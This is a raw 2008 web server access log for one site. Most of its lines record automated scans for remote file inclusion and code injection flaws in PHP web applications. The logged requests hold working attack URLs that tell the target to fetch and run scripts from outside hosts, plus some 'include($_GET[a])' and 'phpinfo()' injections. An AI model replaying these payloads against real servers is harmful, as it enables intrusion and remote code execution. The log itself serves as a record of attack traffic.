189.77.91.153 - - [14/Jul/2008:13:20:28 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
189.77.91.153 - - [14/Jul/2008:13:20:29 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
70.85.102.116 - - [14/Jul/2008:13:20:30 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.18.246 - - [14/Jul/2008:13:20:46 -0700] "GET /logs/access_071119.log HTTP/1.0" 200 21994 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:20:55 -0700] "GET /logs/access_080104.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:20:55 -0700] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:20:55 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:21:06 -0700] "GET /logs/access_080128.log//send_reminders.php?includedir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:13:21:15 -0700] "GET /logs/access_080401.log/download.php?sub=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:21:16 -0700] "GET /logs/access_071225.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:21:25 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:21:41 -0700] "GET /logs/access_080321.log//solpot.html?body=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:21:41 -0700] "GET //solpot.html?body=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:21:42 -0700] "GET /logs//solpot.html?body=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:21:42 -0700] "GET /logs/access_080222.log//solpot.html?body=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:13:21:51 -0700] "GET /logs/page.php5?id=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:13:21:51 -0700] "GET /page.php5?id=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:22:16 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:22:16 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:22:16 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:13:22:27 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:13:22:27 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.5 - - [14/Jul/2008:13:22:33 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.5 - - [14/Jul/2008:13:22:33 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.5 - - [14/Jul/2008:13:22:34 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.5 - - [14/Jul/2008:13:22:35 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.248.162 - - [14/Jul/2008:13:22:45 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [14/Jul/2008:13:22:45 -0700] "GET /logs/index.php?sourcedir=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [14/Jul/2008:13:22:50 -0700] "GET /index.php?sourcedir=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 200 18399 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:22:51 -0700] "GET /logs/access_080401.log/download.php?sub=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:13:22:55 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:13:22:55 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:13:22:55 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:13:22:56 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:13:23:02 -0700] "GET /logs/access_080401.log/download.php?sub=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:23:03 -0700] "GET /logs/access_080401.log/download.php?sub=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.85.102.116 - - [14/Jul/2008:13:23:04 -0700] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.85.102.116 - - [14/Jul/2008:13:23:04 -0700] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:23:22 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:13:23:23 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:13:23:24 -0700] "GET /logs/page.php5?id=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:13:23:24 -0700] "GET /page.php5?id=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:13:23:25 -0700] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.19.67.108 - - [14/Jul/2008:13:23:34 -0700] "GET /logs/access_080418.log//components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.19.67.108 - - [14/Jul/2008:13:23:35 -0700] "GET //components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.19.67.108 - - [14/Jul/2008:13:23:35 -0700] "GET /logs//components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:13:23:38 -0700] "GET /logs/access_080205.log//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:13:23:41 -0700] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:13:23:42 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.19.67.108 - - [14/Jul/2008:13:23:51 -0700] "GET /logs/access_080309.log//components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:23:59 -0700] "GET /logs/access_080207.log//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:13:23:59 -0700] "GET //?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18387 "-" "libwww-perl/5.79" "www.dmulk.com"
194.79.75.195 - - [14/Jul/2008:13:24:01 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.79.75.195 - - [14/Jul/2008:13:24:01 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
70.85.48.114 - - [14/Jul/2008:13:24:01 -0700] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
70.85.48.114 - - [14/Jul/2008:13:24:01 -0700] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:13:24:04 -0700] "GET //?p=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 200 18367 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.48.114 - - [14/Jul/2008:13:24:11 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
70.85.48.114 - - [14/Jul/2008:13:24:11 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
194.79.75.195 - - [14/Jul/2008:13:24:13 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.79.75.195 - - [14/Jul/2008:13:24:13 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:24:18 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:24:18 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:24:19 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.248.162 - - [14/Jul/2008:13:24:28 -0700] "GET /logs/access_080218.log/index.php?sourcedir=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:24:29 -0700] "GET /logs/access_080104.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:24:30 -0700] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:24:30 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:13:24:32 -0700] "GET /logs/page.php5?id=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:13:24:33 -0700] "GET /page.php5?id=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:13:24:36 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:13:24:36 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:24:43 -0700] "GET /logs/access_080326.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.71 - - [14/Jul/2008:13:24:58 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.30.136 - - [14/Jul/2008:13:25:05 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.30.136 - - [14/Jul/2008:13:25:05 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:13:25:08 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:13:25:08 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:13:25:15 -0700] "GET /logs/access_080205.log//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:13:25:26 -0700] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:25:47 -0700] "GET /logs/access_071225.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:25:59 -0700] "GET /logs/access_080329.log//ashnews.php?pathtoashnews=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:25:59 -0700] "GET //ashnews.php?pathtoashnews=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:25:59 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:26:00 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:13:26:15 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 32970 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:26:28 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.101.71 - - [14/Jul/2008:13:27:37 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:13:28:17 -0700] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:13:28:17 -0700] "GET /vwar//includes/functions_install.php?vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.8 - - [14/Jul/2008:13:28:19 -0700] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.8 - - [14/Jul/2008:13:28:20 -0700] "GET /include/Classes.inc.php?tm_includepath=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:13:28:34 -0700] "GET /logs/str.php?p=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:13:28:34 -0700] "GET /logs/str.php?p=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:13:28:34 -0700] "GET /str.php?p=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:13:28:35 -0700] "GET /str.php?p=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:13:28:51 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:29:02 -0700] "GET /logs/access_080315.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:13:29:04 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:29:04 -0700] "GET /logs/access_080315.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:13:29:07 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:13:29:10 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:13:29:20 -0700] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:13:29:20 -0700] "GET /vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:13:29:34 -0700] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:13:29:34 -0700] "GET /vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:13:29:35 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../osyid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:13:29:35 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../osyid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:13:29:35 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../osyid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.30.136 - - [14/Jul/2008:13:29:36 -0700] "GET /logs/access_080313.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.18.246 - - [14/Jul/2008:13:29:50 -0700] "GET /?show=gallery&pageid=17 HTTP/1.0" 200 54285 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.191.30.136 - - [14/Jul/2008:13:29:57 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:13:30:22 -0700] "GET /logs/access_080329.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:13:30:33 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-